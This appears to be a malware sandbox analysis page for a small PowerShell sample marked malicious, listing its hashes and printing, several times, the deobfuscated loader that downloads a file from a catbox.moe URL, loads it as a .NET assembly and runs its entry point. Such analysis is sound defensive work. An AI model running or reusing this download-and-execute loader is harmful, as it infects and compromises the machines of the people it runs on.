Malicious
Malicious

baeb0065cca3668438671673e143d30f

PowerShell
|
MD5: baeb0065cca3668438671673e143d30f
|
Size: 260 B
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
baeb0065cca3668438671673e143d30f
Sha1
f2fcbce596c5d625ea3d57fcf97d390f19588125
Sha256
a889d4486a90d6964b86ee97751fa0c10607fcff8823fd31d968a32edece72cf
Sha384
950d1375642e682b1391d8d3933c051e6bdb2fe60cc4e840ae6b912c6b432ad989683dd0cec1473d766b490d3c7a3460
Sha512
2ddc1791a86443899589c13831f21e60fe26cd8ce74bb45439fc1ea2a8191bfc0c93afb16a431e0b85a0b9666d1d857d39e3c511813efd5a710c19aedfb3ccc4
SSDeep
6:WIukW0HH7FSg1L3ppNJnwqk3rZlLo2MLztkpLkYGEezML37:mngQgd3pjR2M6XwzMX
TLSH
C7D02B932721C7999BC51AC3AC53F9C1941C721A30CCB40112D8EEC1B01ED741F51A34
File Structure
baeb0065cca3668438671673e143d30f
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

irm "https://files.catbox.moe/ey95fs.txt" -OutFile "g.txt" $assembly = [Assembly]::"Load"([File]::"ReadAllBytes"("./g.txt")) $entryPoint = $assembly."EntryPoint" $parameters = New-Object "Object[]" 0 $entryPoint."Invoke"($null, $parameters)

Deobfuscated PowerShell

irm "https://files.catbox.moe/ey95fs.txt" -OutFile "g.txt" $assembly = [Assembly]::"Load"([File]::"ReadAllBytes"("./g.txt")) $entryPoint = $assembly."EntryPoint" $parameters = New-Object "Object[]" 0 $entryPoint."Invoke"($null, $parameters)

baeb0065cca3668438671673e143d30f (260 B)
File Structure
baeb0065cca3668438671673e143d30f
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
Value Location
Deobfuscated PowerShell

irm "https://files.catbox.moe/ey95fs.txt" -OutFile "g.txt" $assembly = [Assembly]::"Load"([File]::"ReadAllBytes"("./g.txt")) $entryPoint = $assembly."EntryPoint" $parameters = New-Object "Object[]" 0 $entryPoint."Invoke"($null, $parameters)

Malicious

baeb0065cca3668438671673e143d30f

Deobfuscated PowerShell

irm "https://files.catbox.moe/ey95fs.txt" -OutFile "g.txt" $assembly = [Assembly]::"Load"([File]::"ReadAllBytes"("./g.txt")) $entryPoint = $assembly."EntryPoint" $parameters = New-Object "Object[]" 0 $entryPoint."Invoke"($null, $parameters)

Malicious

baeb0065cca3668438671673e143d30f > [Deobfuscated PS]

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙